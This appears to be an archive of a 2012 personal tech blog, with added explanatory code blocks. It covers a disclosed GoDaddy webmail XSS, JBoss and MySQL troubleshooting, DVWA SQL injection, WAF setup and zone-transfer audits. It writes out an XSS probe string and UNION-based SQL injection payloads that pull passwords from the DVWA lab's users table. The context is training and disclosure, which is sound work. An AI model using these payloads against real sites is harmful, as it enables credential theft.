Sunday, September 23, 2012

login.secureserver.net (GoDaddy webmail) XSS - fixed

A few weeks back, I notified Godaddy.com support about an XSS vulnerability on their webmail login page, login.secureserver.net. Turns out secureserver.net wasn't as secure as they had hoped it would be. The underlying problem was that they were allowing arbitrary parameters to be passed without sanitizing the input. They've since fixed it to HTML-escape the characters in the params.

To give credit where credit is due, I found out not long ago that http://xss.cx found the bug a few days before I did and did a better job at reporting it. They also found more bugs around this time last year.

http://xss.cx/2012/08/08/ghdb/xss-cross-site-scripting-cwe79-capec86-javascript-injection-rest-url-parameter-example-poc-report-godaddycom.html

And before that...

http://xss.cx/2011/09/16/ghdb/dork-xss-reflected-cross-site-scripting-cwe79-capec86-javascript-injection-insecure-configuration-weak-programming-http-cookie-without-secure-flag-set-injection-example-poc-report-01.html#2.12

Screenshots of my POC bugs below. Pity that I couldn't get it to work on a WebKit-based browser ;(
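As an added illustration (this is not GoDaddy's code and was not part of the original post), here is the pattern in miniature: a login form that reflects a query parameter into a hidden field, once verbatim and once HTML-escaped the way the fix described above works. The parameter name app, the host login.example.net and the probe string are made up for the example.

```python
#!/usr/bin/env python3
"""Added example, not GoDaddy's code: reflecting a query parameter into
login-page markup unescaped (vulnerable) and HTML-escaped (fixed).
The parameter name `app` and the host are hypothetical."""
import html
from urllib.parse import parse_qs, urlsplit

# The hidden field is where the reflected value lands.
TEMPLATE = '<form method="post"><input type="hidden" name="app" value="{app}"></form>'

def _param(url, name):
    """First value of a query parameter, or '' when absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]

def render_unescaped(url):
    """Vulnerable: the parameter is dropped into the attribute verbatim,
    so a double quote closes the attribute and anything after it is markup."""
    return TEMPLATE.format(app=_param(url, "app"))

def render_escaped(url):
    """Fixed: &, <, >, " and ' are escaped before the value is reflected,
    so the browser only ever sees text inside the attribute."""
    return TEMPLATE.format(app=html.escape(_param(url, "app"), quote=True))

# Constructed probe of the kind a reflected-XSS PoC uses: close the
# attribute and the tag, then inject a script element.
PROBE = 'https://login.example.net/?app="><script>alert(1)</script>'

def probe_is_neutralised(render):
    """True when the rendered page contains no tag opened by the probe."""
    return "<script" not in render(PROBE)

if __name__ == "__main__":
    print("unescaped:", render_unescaped(PROBE))
    print("escaped:  ", render_escaped(PROBE))
```

Note that escaping for an attribute context needs the quotes handled as well; html.escape without quote=True would leave the closing double quote intact and the injection would still work.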



Tuesday, August 7, 2012

What happened when I deleted standalone/tmp/vfs/

So I was trying to clear up some disk space on one of our Liferay servers and deleted the temporary deployment files under /apps/liferay/jboss-7.0.2/standalone/tmp/vfs/. After I rm -rf'ed the crap out of that directory and started the server back up I saw that it did not want to start. Great, it's the end of the day and I've just downed a box. YAY.

boot.log spits out:

20:14:24,985 ERROR [stderr] Exception in thread "Controller Boot Thread" java.lang.RuntimeException: org.jboss.as.controller.persistence.ConfigurationPersistenceException: Failed to parse configuration
20:14:24,985 ERROR [stderr] at org.jboss.as.controller.AbstractControllerService$1.run(AbstractControllerService.java:89)
20:14:24,986 ERROR [stderr] at java.lang.Thread.run(Thread.java:722)
20:14:24,987 ERROR [stderr] Caused by: org.jboss.as.controller.persistence.ConfigurationPersistenceException: Failed to parse configuration
20:14:24,987 ERROR [stderr] at org.jboss.as.controller.persistence.XmlConfigurationPersister.load(XmlConfigurationPersister.java:115)
20:14:24,987 ERROR [stderr] at org.jboss.as.controller.AbstractControllerService.boot(AbstractControllerService.java:104)
20:14:24,988 ERROR [stderr] at org.jboss.as.server.ServerService.boot(ServerService.java:195)
20:14:24,988 ERROR [stderr] at org.jboss.as.controller.AbstractControllerService$1.run(AbstractControllerService.java:83)
20:14:24,989 ERROR [stderr] ... 1 more
20:14:24,990 ERROR [stderr] Caused by: com.ctc.wstx.exc.WstxEOFException: Unexpected EOF in prolog
20:14:24,990 ERROR [stderr]  at [row,col {unknown-source}]: [1,0]
20:14:24,991 ERROR [stderr] at com.ctc.wstx.sr.StreamScanner.throwUnexpectedEOF(StreamScanner.java:677)
20:14:24,991 ERROR [stderr] at com.ctc.wstx.sr.BasicStreamReader.handleEOF(BasicStreamReader.java:2104)
20:14:24,991 ERROR [stderr] at com.ctc.wstx.sr.BasicStreamReader.nextFromProlog(BasicStreamReader.java:2010)
20:14:24,992 ERROR [stderr] at com.ctc.wstx.sr.BasicStreamReader.next(BasicStreamReader.java:1102)
20:14:25,003 ERROR [stderr] at com.ctc.wstx.sr.BasicStreamReader.nextTag(BasicStreamReader.java:1125)
20:14:25,003 ERROR [stderr] at org.jboss.staxmapper.XMLMapperImpl.parseDocument(XMLMapperImpl.java:57)
20:14:25,004 ERROR [stderr] at org.jboss.as.controller.persistence.XmlConfigurationPersister.load(XmlConfigurationPersister.java:107)
20:14:25,004 ERROR [stderr] ... 4 more

Since the first line is complaining about the configuration, I figured I'd take a look at standalone.xml. Wait a sec, why is it blank? Mystery solved.

Copied the latest backup config back to its rightful location and started it up.

cp /apps/liferay/jboss-7.0.2/standalone/configuration/standalone_xml_history/<year-month-date-timestamp>/standalone.last.xml /apps/liferay/jboss-7.0.2/standalone/configuration/standalone.xml 

Success. If I can consistently reproduce this, it may be worthwhile to file a bug report.
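If you want to catch this before JBoss does, here is an added pre-start check (not from the original post): it verifies that standalone.xml still parses, since an empty file is exactly what produces the "Unexpected EOF in prolog" above, and when it doesn't, restores the newest standalone.last.xml from standalone_xml_history. Pass your JBOSS_HOME as the only argument; run without one, it builds and repairs a throwaway demo tree whose contents are constructed for illustration.

```python
#!/usr/bin/env python3
"""Added pre-start check, not part of the original post: make sure
standalone.xml still parses and, if it has been emptied, restore the newest
standalone.last.xml from standalone_xml_history. Run with JBOSS_HOME as the
only argument, or with no arguments to exercise a constructed demo tree."""
import shutil
import sys
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

def config_is_sane(path):
    """True if the file exists, is non-empty and parses as XML.
    An empty file fails to parse ('no element found'), which is what
    JBoss reports as 'Unexpected EOF in prolog'."""
    p = Path(path)
    if not p.is_file() or p.stat().st_size == 0:
        return False
    try:
        ET.parse(p)
    except ET.ParseError:
        return False
    return True

def latest_backup(conf_dir):
    """Newest standalone.last.xml under standalone_xml_history, or None.
    JBoss names the history directories by timestamp, so sorting the
    paths lexically also sorts them chronologically."""
    found = sorted(Path(conf_dir).glob("standalone_xml_history/*/standalone.last.xml"))
    return found[-1] if found else None

def restore_if_broken(conf_dir):
    """Restore standalone.xml from the newest backup when it is missing,
    empty or unparsable. Returns the backup used, or None if no restore
    was needed. Raises FileNotFoundError when there is nothing to restore from."""
    cfg = Path(conf_dir) / "standalone.xml"
    if config_is_sane(cfg):
        return None
    src = latest_backup(conf_dir)
    if src is None:
        raise FileNotFoundError(f"no standalone.last.xml under {conf_dir}/standalone_xml_history")
    shutil.copy2(src, cfg)
    return src

def build_demo_tree():
    """Constructed configuration directory for illustration: a blanked
    standalone.xml plus two timestamped backups, the newer one last."""
    conf = Path(tempfile.mkdtemp()) / "standalone" / "configuration"
    for stamp, body in (("20120806-100000", '<server name="older"/>'),
                        ("20120807-201400", '<server name="newer"/>')):
        d = conf / "standalone_xml_history" / stamp
        d.mkdir(parents=True)
        (d / "standalone.last.xml").write_text(body)
    (conf / "standalone.xml").write_text("")   # the blank file the post describes
    return conf

if __name__ == "__main__":
    if len(sys.argv) > 1:
        conf = Path(sys.argv[1]) / "standalone" / "configuration"
    else:
        conf = build_demo_tree()
    used = restore_if_broken(conf)
    print(f"restored {conf / 'standalone.xml'} from {used}" if used else "standalone.xml is fine")
```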

Monday, August 6, 2012

MySQL command-line utilities on OSX

I was looking for mysql command-line utilities on my mac and couldn't seem to find them. Admittedly, I wasn't looking all that thoroughly. I had previously installed mysql-workbench from here - http://www.mysql.com/downloads/workbench/. I like the gui and everything, but it's nice to know what commands you're running when you do an export, import, show databases, etc. 

Anyway, if you're looking for the command-line utilities, cd here:

/Applications/MySQLWorkbench.app/Contents/Resources/

To help avoid repetitive stress and be more efficient (lazy), I created a couple of aliases.

alias mysql='/Applications/MySQLWorkbench.app/Contents/Resources/mysql'
alias mysqldump='/Applications/MySQLWorkbench.app/Contents/Resources/mysqldump'

Hope this helps.

Sunday, July 22, 2012

HTML 5 guitar tuner

I got tired of trying to use the gieson tuner since it's changed sounds over time. Also, wanted to do a little mini project involving HTML5. Check it out.



Wednesday, July 18, 2012

Brooklyn Tech XSS vulnerability

Well Brooklyn Tech, you've been given ample notification and time to fix this.


Tuesday, May 29, 2012

Make me president...and I won't even tell them I'm jewish

Man, I loved this song as a kid. Still do at times, though the main theme of the song doesn't really apply to me as much anymore. Punk rock before the term was ever coined.


Sunday, May 20, 2012

Enable/Disable OS X screen lock via shell

I'm sure that I ripped this off from somewhere, but can't seem to recall from where. Apologies to whomever's work I've used but not credited.


#!/bin/sh
# Turn "Require password to wake this computer from sleep or screen saver" on or off.
# Usage: screenlock.sh on|off
case "$1" in
  on)  require=true ;;
  off) require=false ;;
  *)   echo "usage: $0 on|off" >&2; exit 1 ;;
esac

osascript -e "tell application \"System Events\"
tell security preferences
set properties to {require password to wake:$require}
end tell
end tell"

Thursday, May 10, 2012

I'm pretty sure I didn't eat the spoon

A few weeks ago, I woke up in the middle of the night, went to the fridge and ate a yogurt. When I awoke, I saw the empty container, but the spoon I used was gone. For a while there, I was worried that I somehow ate the spoon in my sleep-eating daze.

After some time, I realized that I'd be in some serious pain or just plain choking if I ate a friggin spoon.

However, this woman did.

Saturday, March 17, 2012

ERROR 2002 (HY000): Can't connect to local MySQL server through socket

root@localhost# mysql -u root
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
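Added diagnostic, not part of the original post: the number in parentheses at the end of that message is the OS errno, and 2 is ENOENT, so the client is telling you the socket file simply isn't there (mysqld isn't running, or it creates its socket somewhere other than where the client looks). This script decodes the errno and checks the socket path the client names. The sample line is the one above.

```python
#!/usr/bin/env python3
"""Added example, not from the original post: decode the errno that the
mysql client prints after ERROR 2002 and check the socket path it names."""
import errno
import os
import re
import stat
import sys

# Matches: ... through socket '/var/run/mysqld/mysqld.sock' (2)
ERR2002_RE = re.compile(r"through socket '([^']*)' \((\d+)\)")

HINTS = {
    errno.ENOENT: "socket file does not exist: mysqld is not running, or it creates "
                  "its socket elsewhere (compare 'socket=' under [mysqld] and [client] "
                  "in my.cnf, or connect with --protocol=tcp)",
    errno.EACCES: "no permission on the socket file or one of its parent directories",
    errno.ECONNREFUSED: "socket file exists but nothing is listening on it: stale "
                        "socket left behind, mysqld is down",
}

def parse_error(line):
    """Return (socket_path, errno_int) from an ERROR 2002 line, or None."""
    m = ERR2002_RE.search(line)
    return (m.group(1), int(m.group(2))) if m else None

def explain(err):
    """Symbolic errno name, the C library's text for it, and a MySQL-specific hint."""
    name = errno.errorcode.get(err, "?")
    return f"{name} ({os.strerror(err)}): {HINTS.get(err, 'see errno(3)')}"

def socket_state(path):
    """'missing', 'permission-denied', 'not-a-socket' or 'socket'."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return "missing"
    except PermissionError:
        return "permission-denied"
    return "socket" if stat.S_ISSOCK(st.st_mode) else "not-a-socket"

def diagnose(line):
    """One-line verdict for a pasted client error message."""
    parsed = parse_error(line)
    if parsed is None:
        return "not an ERROR 2002 socket error"
    sock, err = parsed
    return f"{sock}: {socket_state(sock)}; {explain(err)}"

# Constructed sample: the line from the post.
SAMPLE = ("ERROR 2002 (HY000): Can't connect to local MySQL server through socket "
          "'/var/run/mysqld/mysqld.sock' (2)")

if __name__ == "__main__":
    print(diagnose(sys.argv[1] if len(sys.argv) > 1 else SAMPLE))
```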

Sunday, February 26, 2012

Wednesday, February 22, 2012

How to: set up a Web Application Firewall


This document should serve as a guide for configuring a Web Application Firewall running Apache, mod_proxy and mod_security. I've written this down mainly as a reminder for myself, but if it helps someone out there working on this task, then great.
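As an added starting point (an assumed configuration, not the author's own), here is a minimal httpd.conf fragment with the three pieces wired together: mod_proxy as a reverse proxy in front of the application, mod_proxy_http to speak HTTP to it, and mod_security 2.x inspecting requests before they are forwarded. The backend address 10.0.0.5:8080, the ServerName and the log path are placeholders.

```apache
# Added example, not the author's configuration. Placeholders: backend
# 10.0.0.5:8080, ServerName www.example.org, audit log path.
LoadModule proxy_module       modules/mod_proxy.so
LoadModule proxy_http_module  modules/mod_proxy_http.so
LoadModule security2_module   modules/mod_security2.so

<IfModule mod_security2.c>
    # Start with DetectionOnly, watch the audit log for false positives,
    # then switch to On once the rule set is tuned for the application.
    SecRuleEngine On
    SecRequestBodyAccess On
    SecResponseBodyAccess Off
    SecAuditEngine RelevantOnly
    SecAuditLogRelevantStatus "^(?:5|4(?!04))"
    SecAuditLog /var/log/httpd/modsec_audit.log

    # Placeholder local rule; in practice load the OWASP Core Rule Set here.
    SecRule ARGS "@rx (?i)<script" \
        "id:100001,phase:2,deny,status:403,log,msg:'Script tag in request argument'"
</IfModule>

<VirtualHost *:80>
    ServerName www.example.org
    # Reverse proxy only: never let the WAF host become an open forward proxy.
    ProxyRequests Off
    ProxyPreserveHost On
    ProxyPass        / http://10.0.0.5:8080/
    ProxyPassReverse / http://10.0.0.5:8080/
</VirtualHost>
```

The rule id and phase are mandatory in mod_security 2.7 and later; phase 2 runs after the request body has been read, which is what SecRequestBodyAccess On is for, so POST parameters are inspected as well as the query string.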

Tuesday, February 21, 2012

DVWA - SQL Injection: Medium, solved.

On the low setting, the following works to extract the data from first_name and password columns.

a' UNION ALL SELECT first_name, password from dvwa.users;#'

Thanks to hackyea.com
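To see why the low-level payload above stops working on medium, here is an added example (not DVWA's PHP, and not from the original post) that reduces the two query builders from DVWA 1.0.7's SQL injection page to Python. Low drops the raw id inside single quotes; medium runs it through mysql_real_escape_string but then uses it unquoted, in numeric context, so the backslash-escaped quotes break the low payload while a payload with no quotes at all still slips through. The escaping function mirrors mysql_real_escape_string for the characters that matter here.

```python
#!/usr/bin/env python3
"""Added example, not DVWA's own PHP: the low and medium query builders
from DVWA 1.0.7's SQL injection page, reduced to Python, with the payload
that fits each level."""

def mysql_real_escape_string(s):
    """Backslash-escape the characters mysql_real_escape_string handles.
    Note what it does NOT do: it never adds quotes around the value."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(c, c) for c in s)

def query_low(user_id):
    """Low: raw input inside single quotes."""
    return f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"

def query_medium(user_id):
    """Medium: escaped, but used unquoted, so a payload that needs no quote
    is untouched by the escaping."""
    return f"SELECT first_name, last_name FROM users WHERE user_id = {mysql_real_escape_string(user_id)}"

# Payload from the post: works on low because it closes the quoted literal.
LOW_PAYLOAD = "a' UNION ALL SELECT first_name, password from dvwa.users;#'"
# Medium payload: numeric context, no quote to escape, comment eats the rest.
MEDIUM_PAYLOAD = "1 UNION ALL SELECT first_name, password FROM dvwa.users#"

def quotes_got_escaped(payload):
    """True if the escaping turned every single quote in the payload into \\'."""
    return "'" in payload and "\\'" in mysql_real_escape_string(payload) \
        and "'" not in mysql_real_escape_string(payload).replace("\\'", "")

if __name__ == "__main__":
    print("low   :", query_low(LOW_PAYLOAD))
    print("medium:", query_medium(LOW_PAYLOAD), "  <- quotes escaped, syntax error")
    print("medium:", query_medium(MEDIUM_PAYLOAD))
```

The fix DVWA's high level applies is not more escaping but the right context: a parameterised query, or at least casting the id to an integer before it goes anywhere near the SQL string.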

Monday, January 30, 2012

iTerm crash


iTerm decided to stop working for me today. Every time I tried launching a new terminal it would crash out, giving me a crash reporter window stating: "iTerm quit unexpectedly. Click Reopen to open the application again...":

python easy_install on Mac OS X Lion

easy_install seems broken on Mac OS X Lion, as of 10.7.2. From what I've seen on the web, it's not just me.

While calling the easy_install script in /usr/bin fails, running the script under /Library/Python/…. works fine.

Sunday, January 29, 2012

How to: create an ssh tunnel

To create an ssh tunnel, this is the basic syntax:

ssh -L 5555:localhost:5900  remoteuser@remotehost.example.org

Where:

Monday, January 2, 2012

Python - TestZoneTransfer

Here's a python script to help find world-transferable DNS domains within your organization. Alternatively, you could search through your .conf files for ACL weaknesses/misconfigurations, but that can become quite cumbersome when dealing with large datasets.
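The script itself isn't reproduced here, so as an added example (my own, not the author's TestZoneTransfer) here is one way to do the same job by driving dig from Python, which avoids needing dnspython: look up the authoritative name servers for each zone, request an AXFR from each, and treat a response bracketed by two SOA records as a successful transfer. The dig output embedded below is constructed for the example, not a real capture, and ns1/ns2.example.org are placeholders.

```python
#!/usr/bin/env python3
"""Added example, not the post's TestZoneTransfer script: find zones whose
authoritative servers allow AXFR to anyone, by shelling out to dig (assumed
on PATH). The embedded dig output is constructed, not a real capture."""
import re
import subprocess
import sys

# Constructed sample of dig refusing a transfer.
SAMPLE_REFUSED = """; <<>> DiG 9.8.1-P1 <<>> axfr example.org @ns1.example.org
;; global options: +cmd
; Transfer failed.
"""

# Constructed sample of a successful transfer: SOA, records, SOA again.
SAMPLE_OPEN = """; <<>> DiG 9.8.1-P1 <<>> axfr example.org @ns2.example.org
;; global options: +cmd
example.org.\t3600\tIN\tSOA\tns1.example.org. hostmaster.example.org. 2012010201 7200 3600 1209600 3600
example.org.\t3600\tIN\tNS\tns1.example.org.
intranet.example.org.\t3600\tIN\tA\t10.0.0.12
example.org.\t3600\tIN\tSOA\tns1.example.org. hostmaster.example.org. 2012010201 7200 3600 1209600 3600
;; Query time: 3 msec
"""

# name  ttl  IN  type  rdata
RECORD_RE = re.compile(r"^(\S+)\s+\d+\s+IN\s+(\S+)\s+(.*)$")

def parse_axfr(output):
    """Records as (name, type, rdata) tuples from dig axfr output;
    empty if the server refused or the transfer failed."""
    if "Transfer failed" in output:
        return []
    records = []
    for line in output.splitlines():
        if not line or line.startswith(";"):
            continue
        m = RECORD_RE.match(line)
        if m:
            records.append(m.groups())
    return records

def zone_is_transferable(output):
    """A complete AXFR starts and ends with the zone's SOA record."""
    return sum(1 for r in parse_axfr(output) if r[1] == "SOA") >= 2

def try_axfr(zone, server, timeout=15):
    """Ask one server for a transfer; returns dig's stdout ('' on error)."""
    cmd = ["dig", "+time=5", "+tries=1", "axfr", zone, f"@{server}"]
    try:
        return subprocess.run(cmd, capture_output=True, text=True, timeout=timeout).stdout
    except (OSError, subprocess.TimeoutExpired):
        return ""

def nameservers(zone):
    """Authoritative NS names for the zone via dig +short."""
    out = subprocess.run(["dig", "+short", "NS", zone], capture_output=True, text=True).stdout
    return [ns.rstrip(".") for ns in out.split()]

def audit(zones):
    """Map each zone to the list of its servers that handed over the zone."""
    findings = {}
    for zone in zones:
        for ns in nameservers(zone):
            if zone_is_transferable(try_axfr(zone, ns)):
                findings.setdefault(zone, []).append(ns)
    return findings

if __name__ == "__main__":
    for zone, servers in audit(sys.argv[1:]).items():
        print(f"{zone}: AXFR allowed from {', '.join(servers)}")
```

Run it with the zones you own as arguments; a server that answers should have an allow-transfer ACL restricted to its secondaries, and the records that came back (internal hostnames and addresses) are a good illustration of what an outsider would otherwise learn.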